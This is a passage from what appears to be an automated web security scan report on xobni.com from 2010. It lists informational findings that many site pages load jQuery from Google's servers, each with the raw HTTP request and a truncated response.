   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.70. http://www.xobni.com/learnmore/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni for BlackBe
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.71. http://www.xobni.com/learnmore/mobile/blackberry/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/blackberry/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile/blackberry/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.72. http://www.xobni.com/learnmore/mobile/blackberry/get_started

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/blackberry/get_started

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile/blackberry/get_started HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11983

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.73. http://www.xobni.com/learnmore/mobile/blackberry/get_started.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/blackberry/get_started.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile/blackberry/get_started.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11995

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.74. http://www.xobni.com/learnmore/mobile/blackberry/magic_address_book

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/blackberry/magic_address_book

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile/blackberry/magic_address_book HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10779

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni for BlackBe
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.75. http://www.xobni.com/learnmore/mobile/blackberry/setup_instructions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/blackberry/setup_instructions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile/blackberry/setup_instructions HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10749

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.76. http://www.xobni.com/learnmore/mobile/blackberry/setup_instructions.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/blackberry/setup_instructions.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile/blackberry/setup_instructions.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10761

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.77. http://www.xobni.com/learnmore/mobile/buynow

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/buynow

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile/buynow HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7795

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.78. http://www.xobni.com/learnmore/mobile/trial

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/trial

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile/trial HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.79. http://www.xobni.com/learnmore/one/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/one/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/one/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9454

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni One - Verbi
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.80. http://www.xobni.com/learnmore/plus/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/plus/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/plus/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Plus - Rech
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.81. http://www.xobni.com/learnmore/plus/advanced_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/plus/advanced_search.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/plus/advanced_search.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Advanced Search f
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.82. http://www.xobni.com/learnmore/video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/video

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/video HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/enterprise
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.4.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Video Gal
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.83. http://www.xobni.com/legal/ip_policy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /legal/ip_policy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /legal/ip_policy HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>IP Policy</TITLE>
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.84. http://www.xobni.com/legal/license

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /legal/license

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /legal/license HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Contrat de Licenc
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.85. http://www.xobni.com/legal/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /legal/privacy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /legal/privacy HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19920

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Politique de conf
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.86. http://www.xobni.com/legal/tos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /legal/tos

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /legal/tos HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 29656

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Conditions géné
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.87. http://www.xobni.com/legal/trademarks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /legal/trademarks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /legal/trademarks HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Trademarks and Br
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.88. http://www.xobni.com/linkedin-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /linkedin-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /linkedin-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
